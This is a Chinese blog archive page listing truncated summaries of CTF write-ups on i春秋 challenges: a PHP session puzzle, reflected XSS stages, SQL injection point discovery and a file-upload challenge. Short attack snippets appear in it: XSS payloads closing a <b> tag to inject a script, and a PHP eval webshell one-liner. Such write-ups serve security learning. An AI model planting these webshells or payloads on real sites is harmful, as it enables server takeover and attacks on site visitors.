01 2021 档案

摘要:error_reporting(0);// 关闭错误报告 session_start();//启动会话 require('./flag.php'); if(!isset($_SESSION['nums'])){//isset() — 检测nums变量是否设置。 $_SESSION['nums'] = 阅读全文
posted @ 2021-01-30 13:14 C10ud 阅读(133) 评论(0) 推荐(0)
摘要:stage1 随便提交一个参数 查看HTML 发现提交的参数被b标签所包裹 构造payload </b><script>alert(document.domain)</script> 将b标签闭合 提交得到域名 stage2 提交参数 继续考虑闭合 标签 构造payload "><script>al 阅读全文
posted @ 2021-01-27 17:33 C10ud 阅读(265) 评论(0) 推荐(0)
摘要:题目地址https://www.ichunqiu.com/battalion?t=1“百度杯”CTF比赛 九月场 题目名称:SQL注入 http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/inde 阅读全文
posted @ 2021-01-27 16:36 C10ud 阅读(87) 评论(0) 推荐(1)
摘要:题目链接 https://www.ichunqiu.com/battalion?t=1 很明显是菜刀连接 查看flag.php目录 上传一句话木马 <?php @eval($_POST["a"]); ?> 点击上传成功跳转到文件目录 @eval($_POST["code"]); ?> 发现<?和ph 阅读全文
posted @ 2021-01-27 11:27 C10ud 阅读(129) 评论(0) 推荐(1)
摘要:加单引号双引号不断测试的目的是需找到注入点,当页面出现语法报错时,说明你传入的值被成功带入到数据库,没有被防护手段所过滤到,所以我们可以控制传入什么样的参数,这样就可以利用联合查询,将union前的参数定为一个数据库肯定不存在的值。 但是还需要知到这个值的格式才能真正的控制,所以需要确定格式,可以通 阅读全文
posted @ 2021-01-12 12:11 C10ud 阅读(52) 评论(0) 推荐(0)